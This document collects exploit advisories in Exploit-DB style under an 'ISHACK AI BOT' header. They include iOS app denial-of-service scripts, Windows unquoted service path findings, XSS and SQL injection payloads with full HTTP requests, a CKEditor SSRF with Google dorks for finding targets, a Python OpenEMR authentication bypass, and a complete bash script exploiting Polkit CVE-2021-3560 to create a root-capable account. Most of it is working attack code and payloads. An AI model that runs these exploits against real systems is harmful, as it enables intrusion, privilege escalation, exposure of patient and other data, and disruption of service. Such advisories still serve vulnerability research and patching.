ISHACK AI BOT

# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 # Version: 3.0.3 # Category: DoS (iOS) ##### Vulnerability ##### Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/es/app/post-it/id920127738 # Version: 5.0.1 # Category: DoS (iOS) ##### Vulnerability ##### Post-it is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 # Version: 6.4 # Category: DoS (iOS) ##### Vulnerability ##### Notex – the best notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/ # Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md # Tested Version: 4.64 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files\Tftpd64_SE\tftpd64_svc.exe Auto C:\Users\IEUser>sc qc Tftpd32_svc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Tftpd32_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Tftpd32 service edition DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://support.brother.com/ # Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214 # Tested Version: 3.0.7 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ BrPrAuSvc BrAuSvc C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe Auto Brother BRPrintAuditor Agent BRPA_Agent C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe Auto C:\Users\IEUser>sc qc BrAuSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BrAuSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe GRUPO_ORDEN_CARGA : BrotherSplGroup ETIQUETA : 0 NOMBRE_MOSTRAR : BrPrAuSvc DEPENDENCIAS : Spooler NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc BRPA_Agent [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BRPA_Agent TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Brother BRPrintAuditor Agent DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/clientms/admin/index.php 2) Login as admin using test credentials: admin/Test@123 3) Goto: http://localhost/clientms/admin/admin-profile.php 4) Enter the following payload in the user name field: <script>alert(1)</script> 5) Click on Update 6) Our payload is fired and stored

# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/clientms/admin/index.php 2) Login as admin using test credentials: admin/Test@123 3) Goto: http://localhost/clientms/admin/search-invoices.php 4) Enter the following payload in the search field: ' OR 'x'='x 5) All results are showed instead of none ==> SQL Injection success

# Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://www.sysgauge.com # Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe # Tested Version: 7.9.18 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ C:\>sc qc "SysGauge Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SysGauge Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge Server\bin\sysgaus.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : SysGauge Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://brother.com # Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46 # Tested Version: 1.38 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Brother BRAgent WBA_Agent_Client C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe Auto C:\>sc qc WBA_Agent_Client [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: WBA_Agent_Client TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Brother BRAgent DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation # Date: 06/11/2021 # Exploit Author: J Smith (CadmusofThebes) # Vendor Homepage: https://www.freedesktop.org/ # Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html # Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora) # Tested on: Ubuntu 20.04, Fedora 33 # CVE: CVE-2021-3560 # Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ #!/bin/bash # Set the name and display name userName="hacked" realName="hacked" # Set the account as an administrator accountType=1 # Set the password hash for 'password' and password hint password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB' passHint="password" # Check Polkit version polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9) if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then echo "[*] Vulnerable version of polkit found" else echo "[!] WARNING: Version of polkit might not vulnerable" fi # Validate user is running in SSH instead of desktop terminal if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts" exit fi # Test the dbus-send timing to load into exploit echo "[*] Determining dbus-send timing" realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 ) halfTime=$(echo "scale=3;$realTime/2" | bc) # Check for user first in case previous run of script failed on password set if id "$userName" &>/dev/null; then userid=$(id -u $userName) echo "[*] New user $userName already exists with uid of $userid" else userid="" echo "[*] Attempting to create account" while [[ $userid == "" ]] do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null if id "$userName" &>/dev/null; then userid=$(id -u $userName) echo "[*] New user $userName created with uid of $userid" fi done fi # Add the password to /etc/shadow # Sleep added to ensure there is enough of a delay between timestamp checks echo "[*] Adding password to /etc/shadow and enabling user" sleep 1 currentTimestamp=$(stat -c %Z /etc/shadow) fileChanged="n" while [ $fileChanged == "n" ] do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then fileChanged="y" echo "[*] Exploit complete!" fi done echo "" echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"

# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://www.diskpulse.com # Software Links: # https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe # https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe # Tested Version: 13.6.14 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe Auto Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse Server\bin\diskpls.exe Auto C:\Users\IEUser>sc qc "Disk Pulse Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Pulse Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Pulse Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc "Disk Pulse Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Pulse Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse Server\bin\diskpls.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Pulse Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path # Discovery by: BRushiran # Date: 15-06-2021 # Vendor Homepage: https://www.disksorter.com # Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe # Tested Version: 13.6.12 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter Server\bin\disksrs.exe Auto C:\>sc qc "Disk Sorter Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Sorter Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter Server\bin\disksrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Sorter Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path # Discovery by: BRushiran # Date: 15-06-2021 # Vendor Homepage: https://www.disksorter.com # Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe # Tested Version: 13.6.12 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Sorter Enterprise Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto C:\>sc qc "Disk Sorter Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Sorter Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Sorter Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulnerable Software: https://www.cotonti.com/download/siena_0919 # Affected Version: 0.9.19 # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: maintitle # Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img> # Description 1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php) 2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param 3) Then click Update button 4) In the end, Go to home page then shown triggered vulnerability # Proof of Concepts Request; POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1 Host: vulnerableapplication.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 440 Origin: https://vulnerableapplication.com Connection: close Referer: https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title Cookie: __cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; __gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3 &x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D Response; HTTP/1.1 200 OK Date: Tue, 15 Jun 2021 16:07:59 GMT Server: Apache Expires: Mon, Apr 01 1974 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0 Pragma: no-cache Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT Vary: Accept-Encoding X-Robots-Tag: noindex,nofollow Content-Length: 4366 Connection: close Content-Type: text/html; charset=UTF-8 <h1 class="body"><a href="admin.php" title="Administration panel">Administration panel</a> / <a href="admin.php?m=config" title="Configuration">Configuration</a> / <a href="admin.php?m=config&n=edit&o=core&p=title" title="Titles and Metas">Titles and Metas</a></h1> <div id="main" class="body clear"> <h2>Configuration</h2> <div class="done"> <h4>Done</h4> <ul> <li>Updated</li> </ul> </div>

# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass # Date 15.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip # Version: All versions prior to 5.0.1.4 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-15152 # CWE: CWE-287 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit ''' Description: An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested url to access the desired page. Some examples of pages in the portal directory that are accessible after browsing to the registration page include: - add_edit_event_user.php - find_appt_popup_user.php - get_allergies.php - get_amendments.php - get_lab_results.php - get_medications.php - get_patient_documents.php - get_problems.php - get_profile.php - portal_payment.php - messaging/messages.php - messaging/secure_chat.php - report/pat_ledger.php - report/portal_custom_report.php - report/portal_patient_report.php Normally, access to these pages requires authentication as a patient. If a user were to visit any of those pages unauthenticated, they would be redirected to the login page. ''' ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--Openemrpath', type=str) my_parser.add_argument('-R', '--PathToGet', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.Openemrpath pathtoread = args.PathToGet ''' Check for vulnerability: ''' # Check, if Registration portal is enabled. If it is not, this exploit can not work session = requests.Session() check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' check_vuln = session.get(check_vuln_url).text print('') print('[*] Checking vulnerability: ') print('') if "Enter email address to receive registration." in check_vuln: print('[+] Host Vulnerable. Proceeding exploit') else: print('[-] Host is not Vulnerable: Registration for patients is not enabled') ''' Exploit: ''' header = { 'Referer': check_vuln_url } exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread Exploit = session.get(exploit_url, headers=header) print('') print('[+] Results: ') print('') print(Exploit.text) print('')

# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 + XAMPP v3.2.4 POC: 1. Go to url http://localhost/login.php 2. Login with default creds 3. Execute the payload Payload #1: POST /admin/search.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://localhost Connection: close Referer: http://localhost/trms/admin/search.php Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0 Upgrade-Insecure-Requests: 1 searchdata=a' or 1=1-- -&search= Payload #2: http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- - Payload #3: http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -

# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 + XAMPP v3.2.4 POC: 1. Go to url http://localhost/admin/index.php 2. Do login 3. Execute the payload 4. Reload page to see the different Payload: POST /admin/adminprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/trms/admin/adminprofile.php Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l Upgrade-Insecure-Requests: 1 adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=

# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html # Date: 12-6-2021 # Exploit Author: Blackangel # Software Link: https://ckeditor.com/ # Version:all version under 4 (1,2,3) # Tested on: windows 7 Steps of Exploit:- 1-using google dorks inurl /editor/filemanager/connectors/uploadtest.html 2-after going to vulnerable page you will find filed “Custom Uploader URL: ” 3-right click then choose inspect element, click on pick an element from the page , select field Custom Uploader URL: 4-in elements “<input id=”txtCustomUrl” style=”WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc” disabled=”” type=”text”>” delete disabled=”” 5-now you can put url start with any protocal 6-send it to the server as you see website that you have entered link is appear into page . what this mean??!!1 you send request to server using vulnerable website you can said i used it as proxy hackers >>> vulnerable website >>> http:/xx.com so in http://xx.com logs requests come from vulnerable website impact:- 1-that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing. if there is big company use old version hackers can send request via there websites and this not good for reputation of company 2-put big company website in blacklist of websites cause i hackers can send many of request via vulnerable website Mitigation:- Remove the uploadtest.html file as it is not used by the application.

# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection # Shodan Filter: http.title:"TCN User Dashboard" # Date: 06-16-2021 # Exploit Author: Ajaikumar Nadar # Vendor Homepage: https://unifiedoffice.com/ # Software Link: https://unifiedoffice.com/voip-business-solutions/ # Version: 1.0 # Tested on: CentOS + Apache/2.2.15 POC: 1. Go to url http://localhost/operator/operatorLogin.php and login 2. Capture the request in Burpsuite and use the payload as given below. 3. Observe the response which reveals the DB version of mysql. Request: POST /operator/operatorLogin.php HTTP/1.1 Host: localhost Connection: close Content-Length: 178 sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/operator/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81 data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"} Response: HTTP/1.1 400 Bad Request Date: Wed, 16 Jun 2021 12:49:56 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 139 Connection: close Content-Type: text/html; charset=UTF-8 Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'

# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.syncbreeze.com/ # Software Links: # https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe # https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe # Tested Version: 13.6.18 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze Server\bin\syncbrs.exe Auto Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto C:\Users\IEUser>sc qc "Sync Breeze Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Server\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc "Sync Breeze Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

